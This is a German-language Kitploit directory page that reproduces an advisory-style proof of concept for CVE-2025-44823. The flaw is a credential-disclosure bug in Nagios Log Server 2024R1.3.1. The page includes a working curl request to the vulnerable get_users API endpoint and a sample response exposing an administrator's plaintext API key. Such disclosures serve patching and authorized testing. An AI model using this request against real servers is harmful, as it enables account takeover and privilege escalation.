Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-44823 — Authentifizierte API-Schlüssel-Offenlegung in Nagios Log Server 2024R1.3.1 | Kitploit
Tools/GitHubGitHub/skraft9/cve-2025-44823
Privilege EscalationSchwachstellenanalyseExploitationInformationsbeschaffungAuthentifizierungAPI-Sicherheit
GitHubskraft9/cve-2025-44823

CVE-2025-44823

Authentifizierte API-Schlüssel-Offenlegung in Nagios Log Server 2024R1.3.1

Repository anzeigen
1vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Authentifizierte API-Schlüssel-Offenlegung in Nagios Log Server 2024R1.3.1

▶️ PoC Demo

CVE-ID: CVE-2025-44823

Datum: 2025-04-02

Autoren: Alex Tisdale, Seth Kraft

Hersteller-Startseite: https://www.nagios.com/

Hersteller-Änderungsprotokoll: https://www.nagios.com/changelog/#log-server

Software-Link: https://assets.nagios.com/downloads/nagios-log-server/versions.php

Version: 2024R1.3.1 und darunter

Getestet auf: Nagios Log Server 2024R1.3.1 (Standardkonfiguration, Ubuntu 20.04)

CWE: CWE-497

CVSS: 9.8 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Autorisierung

Nur für Forschung und autorisierte Tests. Bitte nicht ohne Genehmigung gegen Systeme verwenden.

Beschreibung

Eine Sicherheitslücke auf API-Ebene in Nagios Log Server 2024R1.3.1 erlaubt es jedem Benutzer mit einem gültigen API-Token, eine vollständige Liste der Benutzerkonten zusammen mit ihren Klartext-API-Schlüsseln abzurufen, einschließlich der Anmeldeinformationen von Administratoren. Dieser Fehler ermöglicht Benutzeraufzählung, Privilegieneskalation und eine vollständige Systemkompromittierung durch unbefugte Nutzung der offengelegten Token.

PoC

Schritt 1: Zugriff auf den verwundbaren Endpunkt

root@kitploit:~
curl -X GET "http://<target-ip>/nagioslogserver/index.php/api/system/get_users?token=<valid_token>"

Beispielantwort

root@kitploit:~
[
  {
    "name": "devadmin",
    "username": "devadmin",
    "email": "[email protected]",
    "apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de",
    "auth_type": "admin",
    ...
  }
]
Tool herunterladen